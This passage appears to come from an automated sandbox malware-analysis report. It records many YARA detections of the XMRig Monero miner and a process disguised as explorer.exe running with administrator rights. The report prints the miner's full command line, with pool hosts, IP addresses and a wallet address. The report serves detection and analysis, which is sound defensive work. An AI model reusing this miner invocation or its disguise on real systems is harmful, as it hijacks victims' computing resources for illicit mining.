                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Analysis Process: explorer.exe PID: 6764 Parent PID: 5252

                                                        General

                                                        Start time:18:20:18
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.744667827.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.825932798.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >